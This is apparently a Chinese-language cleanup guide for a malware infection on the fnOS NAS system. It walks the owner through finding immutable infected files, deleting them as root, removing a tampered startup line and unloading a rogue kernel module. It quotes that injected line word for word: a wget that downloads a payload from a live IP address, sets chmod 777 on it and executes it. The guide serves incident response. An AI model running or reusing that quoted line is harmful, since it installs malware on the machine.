ssh连入飞牛OS,su登录root,依此执行以下三个命令
lsattr -Ra /usr > attr 2> /dev/null
grep '\-i-' attr
lsattr -Ra /etc > attr2 2> /dev/null
grep '\-i-' attr2
如发现以下带i和e的文件表示系统已经被植入病毒
----i---------e------- /usr/bin/nginx
----i---------e------- /usr/trim/bin/trim_https_cgi
----i---------e------- /usr/sbin/gots
----i---------e------- /etc/systemd/system/trim_https_cgi.service
----i---------e------- /etc/systemd/system/nginx.service
----i---------e------- /etc/rc.local
由于被加上了不可修改属性需要先用命令解除然后删除
chattr -i /etc/systemd/system/nginx.service
rm /etc/systemd/system/nginx.service
chattr -i /etc/systemd/system/trim_https_cgi.service
rm /etc/systemd/system/trim_https_cgi.service
chattr -i /etc/rc.local
rm /etc/rc.local
chattr -i /usr/sbin/gots
rm /usr/sbin/gots
chattr -i /usr/bin/nginx
rm /usr/bin/nginx
chattr -i /usr/trim/bin/trim_https_cgi
rm /usr/trim/bin/trim_https_cgi 检查/usr/trim/bin/system_startup.sh
vim /usr/trim/bin/system_startup.sh 如果最后一行有wget则代表文件被修改
rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp 将光标移动到最后一行按两下键盘d键删除该行
输入:wq保存退出
检查内核模块:
cat /etc/modules 如果最后出现了snd_pcap,表示已经被植入内核模块
# /etc/modules: kernel modules to load at boot time.
#
# This file contains the names of kernel modules that should be loaded
# at boot time, one per line. Lines beginning with "#" are ignored.
# Parameters can be specified after the module name.
bonding
msr
snd_pcap 执行命令卸载内核模块
modprobe -r snd_pcap || rmmod -f snd_pcap
depmod -a 重启后再次检查是否有恶意文件生成,system_startup.sh是否被篡改